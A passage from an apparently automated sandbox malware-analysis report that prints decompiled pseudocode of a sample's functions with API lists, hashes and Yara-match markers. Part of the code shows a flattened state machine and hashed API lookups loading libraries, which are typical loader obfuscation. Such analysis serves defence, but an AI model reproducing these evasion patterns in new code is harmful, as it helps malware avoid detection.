                                            				_t6 = E00424BFB();
                                            				if( *((char*)(_t6 + 0x14)) == 0) {
                                            					_t7 = E004249C4();
                                            					_t9 = SetWindowsHookExA(0xffffffff, E00412A65, 0, GetCurrentThreadId()); // executed
                                            					_push(E00424441);
                                            					 *(_t7 + 0x30) = _t9;
                                            					_t18 = E00425D27(0x439c50);
                                            					if( *((intOrPtr*)(_t18 + 0x14)) != 0) {
                                            						 *((intOrPtr*)(_t18 + 0x14))( *((intOrPtr*)(E00424BFB() + 8)));
                                            					}
                                            					return E00425C92(0x439c4c, E00424456);
                                            				}
                                            				return _t6;
                                            			}








                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 00412723
                                            • SetWindowsHookExA.USER32 ref: 00412733
                                              • Part of subcall function 00425D27: __EH_prolog.LIBCMT ref: 00425D2C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CurrentH_prologHookThreadWindows
                                            • String ID:
                                            • API String ID: 2183259885-0
                                            • Opcode ID: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
                                            • Instruction ID: e1aa810c2eef3cfbe5d0c04a06800172916402ab6d7e5109c2f22e34ec283244
                                            • Opcode Fuzzy Hash: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
                                            • Instruction Fuzzy Hash: 59F020313006302BCB307B70BA0EB5A2A90DF44318F804A1BF0619A0E2CBBC8C80C7AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040796F(intOrPtr _a4) {
                                            				void* _t6;
                                            				void* _t9;
                                            
                                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                            				 *0x43b63c = _t6;
                                            				if(_t6 == 0) {
                                            					L3:
                                            					return 0;
                                            				} else {
                                            					if(E00407A4A() != 0) {
                                            						_t9 = 1;
                                            						return _t9;
                                            					} else {
                                            						HeapDestroy( *0x43b63c);
                                            						goto L3;
                                            					}
                                            				}
                                            			}






                                            APIs
                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980
                                              • Part of subcall function 00407A4A: HeapAlloc.KERNEL32(00000000,00000140,00407994), ref: 00407A57
                                            • HeapDestroy.KERNEL32 ref: 0040799E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Heap$AllocCreateDestroy
                                            • String ID:
                                            • API String ID: 2236781399-0
                                            • Opcode ID: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
                                            • Instruction ID: 148b4dcf31a7c6b17fb8364a85278eb553451c51f0f99df079208ecffef983c8
                                            • Opcode Fuzzy Hash: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
                                            • Instruction Fuzzy Hash: 26E012B0755301AEEB101B31AC0677A36D4DB54782F149436F544D41F4E7B895519A4B
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			_entry_() {
                                            				void* _t5;
                                            				void* _t8;
                                            				void* _t10;
                                            
                                            				E02236530(_t8);
                                            				if( *0x223e094 == 0) {
                                            					 *0x223e094 = E02233E80(_t5, E02233F20(0xbb398380), 0xff20810a, _t10);
                                            				}
                                            				ExitProcess(0);
                                            			}







                                            APIs
                                            • ExitProcess.KERNEL32(00000000), ref: 02235CCB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: c18f626bd62c2e601dedae607d7f27ce85d5ff8326e1735b070e030a7c522120
                                            • Instruction ID: a7008425a57ec5e33412e394bdf2e75d99925af604c04b986ca7cbd526e88a97
                                            • Opcode Fuzzy Hash: c18f626bd62c2e601dedae607d7f27ce85d5ff8326e1735b070e030a7c522120
                                            • Instruction Fuzzy Hash: F1D0C9A6B61301A6E601AAF0785472A25AB5FA0645F404819F549DA29CEE7489214AD1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E02236FB0(void* __ebx) {
                                            				void* _t2;
                                            				struct HINSTANCE__* _t5;
                                            				intOrPtr* _t6;
                                            				intOrPtr* _t8;
                                            				void* _t21;
                                            				void* _t48;
                                            				WCHAR* _t51;
                                            				void* _t53;
                                            				void* _t54;
                                            				void* _t55;
                                            
                                            				_t21 = __ebx;
                                            				_t2 = 0x2f7561b9;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t54 = _t2 - 0x16eb9dc5;
                                            						if(_t54 > 0) {
                                            							break;
                                            						}
                                            						if(_t54 == 0) {
                                            							E02236F10(_t21, 0x223d770, 4, __eflags);
                                            							_t2 = 0x28da268b;
                                            							continue;
                                            						} else {
                                            							_t55 = _t2 - 0x96aa655;
                                            							if(_t55 > 0) {
                                            								__eflags = _t2 - 0x129c963b;
                                            								if(__eflags != 0) {
                                            									goto L21;
                                            								} else {
                                            									E02236F10(_t21, 0x223d7c0, 3, __eflags);
                                            									_t2 = 0x16eb9dc5;
                                            									continue;
                                            								}
                                            							} else {
                                            								if(_t55 == 0) {
                                            									E02236F10(_t21, 0x223d840, 1, __eflags);
                                            									_t2 = 0x6462a46;
                                            									continue;
                                            								} else {
                                            									if(_t2 == 0x34398df) {
                                            										E02236F10(_t21, 0x223d820, 0, __eflags);
                                            										_t2 = 0x96aa655;
                                            										continue;
                                            									} else {
                                            										_t57 = _t2 - 0x6462a46;
                                            										if(_t2 != 0x6462a46) {
                                            											goto L21;
                                            										} else {
                                            											E02236F10(_t21, 0x223d890, 2, _t57);
                                            											_t2 = 0x129c963b;
                                            											continue;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L30:
                                            					}
                                            					__eflags = _t2 - 0x2cd0d411;
                                            					if(__eflags > 0) {
                                            						__eflags = _t2 - 0x2f7561b9;
                                            						if(__eflags != 0) {
                                            							goto L21;
                                            						} else {
                                            							_t2 = 0x34398df;
                                            							goto L1;
                                            						}
                                            					} else {
                                            						if(__eflags == 0) {
                                            							_t51 = E022334C0(0x223d7f0);
                                            							__eflags =  *0x223ddc4;
                                            							if( *0x223ddc4 == 0) {
                                            								 *0x223ddc4 = E02233E80(_t21, E02233F20(0xbb398380), 0x9261db99, _t53);
                                            							}
                                            							_t5 = LoadLibraryW(_t51); // executed
                                            							 *( *0x223e2e8 + 0x28) = _t5;
                                            							_t6 =  *0x223dea8;
                                            							__eflags = _t6;
                                            							if(_t6 == 0) {
                                            								_t6 = E02233E80(_t21, E02233F20(0xbb398380), 0x97f883e, _t53);
                                            								 *0x223dea8 = _t6;
                                            							}
                                            							_t48 =  *_t6();
                                            							_t8 =  *0x223e1a0;
                                            							__eflags = _t8;
                                            							if(_t8 == 0) {
                                            								_t8 = E02233E80(_t21, E02233F20(0xbb398380), 0x26c3f343, _t53);
                                            								 *0x223e1a0 = _t8;
                                            							}
                                            							return  *_t8(_t48, 0, _t51);
                                            						} else {
                                            							__eflags = _t2 - 0x17b18c59;
                                            							if(__eflags == 0) {
                                            								E02236F10(_t21, 0x223d870, 6, __eflags);
                                            								_t2 = 0x2cd0d411;
                                            								goto L1;
                                            							} else {
                                            								__eflags = _t2 - 0x28da268b;
                                            								if(__eflags != 0) {
                                            									goto L21;
                                            								} else {
                                            									E02236F10(_t21, 0x223d790, 5, __eflags);
                                            									_t2 = 0x17b18c59;
                                            									goto L1;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					goto L30;
                                            					L21:
                                            					__eflags = _t2 - 0x2a0eb481;
                                            				} while (__eflags != 0);
                                            				return _t2;
                                            				goto L30;
                                            			}














                                            APIs
                                            • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,022368DC), ref: 022370F2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: c604fecd2f357d0cd35e3c68154e47d7c3af0cb7dab060c071d8e2c53ccdbbba
                                            • Instruction ID: 9b2ced41c999442ca5a45b78ee36d5abc03ac4ebb41b76e00b316bc642c36f38
                                            • Opcode Fuzzy Hash: c604fecd2f357d0cd35e3c68154e47d7c3af0cb7dab060c071d8e2c53ccdbbba
                                            • Instruction Fuzzy Hash: DD31A1E5B3420267DE27AAF9649433B515F9B84244F64086AF043CF35CDEB9CD128BD6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E02236F10(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                            				struct HINSTANCE__* _t6;
                                            				intOrPtr* _t7;
                                            				intOrPtr* _t9;
                                            				signed int _t28;
                                            				void* _t29;
                                            				WCHAR* _t30;
                                            				void* _t31;
                                            
                                            				_t15 = __ebx;
                                            				_t28 = __edx;
                                            				_t30 = E022334C0(__ecx);
                                            				if( *0x223ddc4 == 0) {
                                            					 *0x223ddc4 = E02233E80(__ebx, E02233F20(0xbb398380), 0x9261db99, _t31);
                                            				}
                                            				_t6 = LoadLibraryW(_t30); // executed
                                            				 *( *0x223e2e8 + 0xc + _t28 * 4) = _t6;
                                            				_t7 =  *0x223dea8;
                                            				if(_t7 == 0) {
                                            					_t7 = E02233E80(_t15, E02233F20(0xbb398380), 0x97f883e, _t31);
                                            					 *0x223dea8 = _t7;
                                            				}
                                            				_t29 =  *_t7();
                                            				_t9 =  *0x223e1a0;
                                            				if(_t9 == 0) {
                                            					_t9 = E02233E80(_t15, E02233F20(0xbb398380), 0x26c3f343, _t31);
                                            					 *0x223e1a0 = _t9;
                                            				}
                                            				return  *_t9(_t29, 0, _t30);
                                            			}











                                            APIs
                                            • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,0223704F,022368DC), ref: 02236F40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: c3d711c0ca32f0422ebe1e4e81bf2c4620ba86f4f24b7bd6bbb35e06b957768c
                                            • Instruction ID: 32c49b9775d694e3b7a3f54abddbe24539b001b80e5412cb69339c7507e8b41b
                                            • Opcode Fuzzy Hash: c3d711c0ca32f0422ebe1e4e81bf2c4620ba86f4f24b7bd6bbb35e06b957768c
                                            • Instruction Fuzzy Hash: FE0178B5B21301ABD715FBF4B89472A26EBAFC06947040CA8F006CB348EE38DD018BD0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00408198(void* __ecx, intOrPtr _a4) {
                                            				intOrPtr _v8;
                                            				signed int _t45;
                                            				intOrPtr _t48;
                                            				signed int _t49;
                                            				intOrPtr _t51;
                                            				intOrPtr _t52;
                                            				intOrPtr _t53;
                                            				signed int _t54;
                                            				intOrPtr* _t55;
                                            				signed int _t57;
                                            				intOrPtr _t60;
                                            				intOrPtr _t61;
                                            				intOrPtr _t62;
                                            				void* _t69;
                                            				void* _t70;
                                            				void* _t77;
                                            				signed int _t78;
                                            				intOrPtr _t81;
                                            
                                            				_t60 = _a4;
                                            				_t81 =  *((intOrPtr*)(_t60 + 0x10));
                                            				_t45 =  *(_t60 + 8);
                                            				_t57 = 0;
                                            				while(_t45 >= 0) {
                                            					_t45 = _t45 << 1;
                                            					_t57 = _t57 + 1;
                                            				}
                                            				_t69 = 0x3f;
                                            				_t48 = _t57 * 0x204 + _t81 + 0x144;
                                            				_v8 = _t48;
                                            				do {
                                            					 *((intOrPtr*)(_t48 + 8)) = _t48;
                                            					 *((intOrPtr*)(_t48 + 4)) = _t48;
                                            					_t48 = _t48 + 8;
                                            					_t69 = _t69 - 1;
                                            				} while (_t69 != 0);
                                            				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
                                            				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
                                            				if(_t49 != 0) {
                                            					_t70 = _t77 + 0x7000;
                                            					if(_t77 <= _t70) {
                                            						_t55 = _t77 + 0x10;
                                            						do {
                                            							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
                                            							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
                                            							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
                                            							 *_t55 = _t55 + 0xffc;
                                            							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
                                            							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
                                            							_t55 = _t55 + 0x1000;
                                            						} while (_t55 - 0x10 <= _t70);
                                            					}
                                            					_t61 = _t77 + 0xc;
                                            					_t51 = _v8 + 0x1f8;
                                            					_t78 = 1;
                                            					 *((intOrPtr*)(_t51 + 4)) = _t61;
                                            					 *((intOrPtr*)(_t61 + 8)) = _t51;
                                            					_t62 = _t70 + 0xc;
                                            					 *((intOrPtr*)(_t51 + 8)) = _t62;
                                            					 *((intOrPtr*)(_t62 + 4)) = _t51;
                                            					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
                                            					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
                                            					_t52 =  *((intOrPtr*)(_t81 + 0x43));
                                            					_t53 = _a4;
                                            					 *((char*)(_t81 + 0x43)) = _t52 + 1;
                                            					if(_t52 == 0) {
                                            						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
                                            					}
                                            					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
                                            					_t54 = _t57;
                                            				} else {
                                            					_t54 = _t49 | 0xffffffff;
                                            				}
                                            				return _t54;
                                            			}






















                                            APIs
                                            • VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,00407EBE,000000E0,00000000,?,?,?,004063F8), ref: 004081E9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
                                            • Instruction ID: a951a9915c6437c0f42f98627e617b565139ecfdaa8fc563ef3f50a1ca92f44d
                                            • Opcode Fuzzy Hash: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
                                            • Instruction Fuzzy Hash: FC319A316006068FD314CF18C984BA5BBE0FF50364F2482BED5598B3E2DB74A906CB44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 73%
                                            			E00407333(signed int _a4, signed int _a8) {
                                            				void* _t8;
                                            				long _t11;
                                            				void* _t13;
                                            				long _t15;
                                            				void* _t17;
                                            				void* _t23;
                                            
                                            				_t15 = _a4 * _a8;
                                            				_t11 = _t15;
                                            				if(_t15 <= 0xffffffe0) {
                                            					if(_t15 == 0) {
                                            						_t15 = 1;
                                            					}
                                            					_t15 = _t15 + 0x0000000f & 0xfffffff0;
                                            				}
                                            				while(1) {
                                            					_t13 = 0;
                                            					if(_t15 > 0xffffffe0) {
                                            						goto L8;
                                            					}
                                            					_t23 = _t11 -  *0x436fa8; // 0x3f8
                                            					if(_t23 > 0) {
                                            						L7:
                                            						_t13 = HeapAlloc( *0x43b63c, 8, _t15);
                                            						if(_t13 != 0) {
                                            							L12:
                                            							return _t13;
                                            						}
                                            						goto L8;
                                            					}
                                            					E004079D4(9);
                                            					_push(_t11); // executed
                                            					_t8 = E00407DDE(); // executed
                                            					_t13 = _t8;
                                            					E00407A35(9);
                                            					_t17 = _t17 + 0xc;
                                            					if(_t13 != 0) {
                                            						E00406330(_t13, 0, _t11);
                                            						goto L12;
                                            					}
                                            					goto L7;
                                            					L8:
                                            					if( *0x439d64 == 0) {
                                            						goto L12;
                                            					}
                                            					if(E00407954(_t15) == 0) {
                                            						return 0;
                                            					}
                                            				}
                                            			}










                                            APIs
                                            • HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: AllocHeap
                                            • String ID:
                                            • API String ID: 4292702814-0
                                            • Opcode ID: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
                                            • Instruction ID: 3f3aad503001cd6b8f63a7fd222fe274e9ba08c9a4469d1d6c832ccce610b396
                                            • Opcode Fuzzy Hash: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
                                            • Instruction Fuzzy Hash: B901F522E086106AF62166296C42B6B22059B807A9F1A0137FE54772D2D6787C01E1EF
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            C-Code - Quality: 96%
                                            			E00410E05(signed int __ecx) {
                                            				signed int _t116;
                                            				signed int _t119;
                                            				signed int _t120;
                                            				struct HWND__* _t124;
                                            				signed int _t126;
                                            				intOrPtr _t127;
                                            				signed char _t141;
                                            				signed int _t145;
                                            				signed int _t149;
                                            				signed int _t150;
                                            				void* _t160;
                                            				intOrPtr* _t167;
                                            				signed int _t169;
                                            				signed int _t182;
                                            				signed int _t183;
                                            				signed int _t186;
                                            				signed int _t188;
                                            				signed int _t198;
                                            				void* _t200;
                                            				signed short _t208;
                                            				intOrPtr _t211;
                                            				void* _t215;
                                            				void* _t217;
                                            				void* _t218;
                                            				void* _t220;
                                            				void* _t221;
                                            
                                            				_t116 = E00406520(E0042AA5D, _t215);
                                            				_t218 = _t217 - 0x74;
                                            				_t167 =  *((intOrPtr*)(_t215 + 8));
                                            				_t208 =  *(_t167 + 4);
                                            				_t198 = __ecx;
                                            				 *(_t215 - 0x10) = __ecx;
                                            				 *(_t215 - 0x1c) = _t208;
                                            				if(_t208 == 0x200 || _t208 == 0xa0 || _t208 == 0x202 || _t208 == 0x205 || _t208 == 0x208) {
                                            					_t116 = GetKeyState(1);
                                            					if(_t116 < 0) {
                                            						L49:
                                            						_t208 =  *(_t215 - 0x1c);
                                            						goto L50;
                                            					}
                                            					_t116 = GetKeyState(2);
                                            					if(_t116 < 0) {
                                            						goto L49;
                                            					}
                                            					_t116 = GetKeyState(4);
                                            					if(_t116 < 0) {
                                            						goto L49;
                                            					} else {
                                            						_push( *_t167);
                                            						L9:
                                            						_t116 = E00413740(_t215);
                                            						if(_t116 != 0 && ( *(_t116 + 0x24) & 0x00000401) == 0) {
                                            							_push(GetParent( *(_t116 + 0x1c)));
                                            							goto L9;
                                            						}
                                            						__eflags = _t116 - _t198;
                                            						if(_t116 == _t198) {
                                            							_t211 = E00425C92(0x4397cc, E0042440D);
                                            							 *((intOrPtr*)(_t215 - 0x18)) = _t211;
                                            							_t169 =  *(_t211 + 0xcc);
                                            							_t119 = E00414D17(_t198);
                                            							__eflags = _t169;
                                            							 *(_t215 - 0x14) = _t119;
                                            							if(_t169 == 0) {
                                            								L19:
                                            								_t120 = E004131DD(0x58);
                                            								 *(_t215 - 0x1c) = _t120;
                                            								_t169 = 0;
                                            								__eflags = _t120;
                                            								 *(_t215 - 4) = 0;
                                            								if(__eflags != 0) {
                                            									_t169 = E00410AA2(_t120);
                                            								}
                                            								 *(_t215 - 4) =  *(_t215 - 4) | 0xffffffff;
                                            								_push(1);
                                            								_t116 = E00410AF7(_t169, __eflags,  *(_t215 - 0x14));
                                            								__eflags = _t116;
                                            								if(_t116 != 0) {
                                            									SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
                                            									_t198 =  *(_t215 - 0x10);
                                            									 *(_t211 + 0xcc) = _t169;
                                            									L25:
                                            									E00406330(_t215 - 0x54, 0, 0x2c);
                                            									_t124 =  *(_t198 + 0x1c);
                                            									_t220 = _t218 + 0xc;
                                            									 *(_t215 - 0x4c) = _t124;
                                            									 *(_t215 - 0x48) = _t124;
                                            									 *(_t215 - 0x54) = 0x28;
                                            									 *(_t215 - 0x50) = 1;
                                            									_t126 = SendMessageA( *(_t169 + 0x1c), 0x408, 0, _t215 - 0x54);
                                            									__eflags = _t126;
                                            									if(_t126 == 0) {
                                            										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
                                            									}
                                            									_t127 =  *((intOrPtr*)(_t215 + 8));
                                            									 *((intOrPtr*)(_t215 - 0x24)) =  *((intOrPtr*)(_t127 + 0x18));
                                            									 *(_t215 - 0x28) =  *(_t127 + 0x14);
                                            									ScreenToClient( *(_t198 + 0x1c), _t215 - 0x28);
                                            									E00406330(_t215 - 0x80, 0, 0x2c);
                                            									_t221 = _t220 + 0xc;
                                            									 *(_t215 - 0x80) = 0x28;
                                            									_t116 =  *((intOrPtr*)( *_t198 + 0x64))( *(_t215 - 0x28),  *((intOrPtr*)(_t215 - 0x24)), _t215 - 0x80);
                                            									 *(_t215 - 0x1c) = _t116;
                                            									asm("sbb ecx, ecx");
                                            									_t182 =  ~(_t116 + 1) & _t198;
                                            									__eflags =  *(_t211 + 0xd4) - _t116;
                                            									 *(_t215 - 0x14) = _t182;
                                            									if( *(_t211 + 0xd4) != _t116) {
                                            										L33:
                                            										__eflags = _t116 - 0xffffffff;
                                            										if(_t116 == 0xffffffff) {
                                            											SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
                                            											L42:
                                            											E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
                                            											__eflags =  *(_t211 + 0xd8) - 0x28;
                                            											_t91 = _t211 + 0xd8; // 0xd8
                                            											_t200 = _t91;
                                            											if( *(_t211 + 0xd8) >= 0x28) {
                                            												SendMessageA( *(_t169 + 0x1c), 0x405, 0, _t200);
                                            											}
                                            											 *(_t211 + 0xd0) =  *(_t215 - 0x14);
                                            											 *(_t211 + 0xd4) =  *(_t215 - 0x1c);
                                            											_t183 = 0xb;
                                            											_t116 = memcpy(_t200, _t215 - 0x80, _t183 << 2);
                                            											goto L45;
                                            										}
                                            										_t186 = 0xb;
                                            										_t141 = memcpy(_t215 - 0x54, _t215 - 0x80, _t186 << 2);
                                            										_t221 = _t221 + 0xc;
                                            										_t188 =  *(_t215 - 0x10);
                                            										 *(_t215 - 0x50) = _t141;
                                            										__eflags =  *(_t188 + 0x24) & 0x00000400;
                                            										if(( *(_t188 + 0x24) & 0x00000400) != 0) {
                                            											_t150 = _t141 | 0x00000020;
                                            											__eflags = _t150;
                                            											 *(_t215 - 0x50) = _t150;
                                            										}
                                            										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
                                            										__eflags =  *(_t215 - 0x79) & 0x00000040;
                                            										if(( *(_t215 - 0x79) & 0x00000040) != 0) {
                                            											L38:
                                            											SendMessageA( *(_t169 + 0x1c), 0x401, 1, 0);
                                            											_t145 =  *(_t215 - 0x10);
                                            											__eflags =  *(_t145 + 0x24) & 0x00000400;
                                            											if(( *(_t145 + 0x24) & 0x00000400) != 0) {
                                            												SendMessageA( *(_t169 + 0x1c), 0x411, 1, _t215 - 0x54);
                                            											}
                                            											SetWindowPos( *(_t169 + 0x1c), 0, 0, 0, 0, 0, 0x213);
                                            											goto L41;
                                            										} else {
                                            											_t149 = E00414D5B( *(_t215 - 0x10));
                                            											__eflags = _t149;
                                            											if(_t149 == 0) {
                                            												L41:
                                            												_t211 =  *((intOrPtr*)(_t215 - 0x18));
                                            												goto L42;
                                            											}
                                            											goto L38;
                                            										}
                                            									} else {
                                            										__eflags =  *(_t211 + 0xd0) - _t182;
                                            										if( *(_t211 + 0xd0) != _t182) {
                                            											goto L33;
                                            										}
                                            										__eflags =  *(_t198 + 0x25) & 0x00000004;
                                            										if(( *(_t198 + 0x25) & 0x00000004) == 0) {
                                            											__eflags = _t116 - 0xffffffff;
                                            											if(_t116 != 0xffffffff) {
                                            												_t116 = E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
                                            											}
                                            										} else {
                                            											GetCursorPos(_t215 - 0x20);
                                            											_t116 = SendMessageA( *(_t169 + 0x1c), 0x412, 0, ( *(_t215 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t215 - 0x20) & 0x0000ffff);
                                            										}
                                            										L45:
                                            										__eflags =  *((intOrPtr*)(_t215 - 0x5c)) - 0xffffffff;
                                            										if( *((intOrPtr*)(_t215 - 0x5c)) != 0xffffffff) {
                                            											__eflags =  *(_t215 - 0x60);
                                            											if( *(_t215 - 0x60) == 0) {
                                            												_t116 = E004062E0( *((intOrPtr*)(_t215 - 0x5c)));
                                            											}
                                            										}
                                            										goto L78;
                                            									}
                                            								} else {
                                            									__eflags = _t169;
                                            									if(_t169 != 0) {
                                            										_t116 =  *((intOrPtr*)( *_t169 + 4))(1);
                                            									}
                                            									goto L78;
                                            								}
                                            							}
                                            							_t160 = E00404FFE(_t169);
                                            							__eflags = _t160 -  *(_t215 - 0x14);
                                            							if(_t160 !=  *(_t215 - 0x14)) {
                                            								 *((intOrPtr*)( *_t169 + 0x58))();
                                            								 *((intOrPtr*)( *_t169 + 4))(1);
                                            								_t169 = 0;
                                            								__eflags = 0;
                                            								 *(_t211 + 0xcc) = 0;
                                            							}
                                            							__eflags = _t169;
                                            							if(_t169 != 0) {
                                            								goto L25;
                                            							} else {
                                            								goto L19;
                                            							}
                                            						} else {
                                            							__eflags = _t116;
                                            							if(_t116 == 0) {
                                            								_t116 = E00425C92(0x4397cc, E0042440D);
                                            								 *(_t116 + 0xd0) =  *(_t116 + 0xd0) & 0x00000000;
                                            								 *(_t116 + 0xd4) =  *(_t116 + 0xd4) | 0xffffffff;
                                            							}
                                            							goto L78;
                                            						}
                                            					}
                                            				} else {
                                            					L50:
                                            					__eflags =  *(_t198 + 0x24) & 0x00000401;
                                            					if(( *(_t198 + 0x24) & 0x00000401) == 0) {
                                            						L78:
                                            						 *[fs:0x0] =  *((intOrPtr*)(_t215 - 0xc));
                                            						return _t116;
                                            					}
                                            					_push( *_t167);
                                            					while(1) {
                                            						_t116 = E00413740(_t215);
                                            						__eflags = _t116;
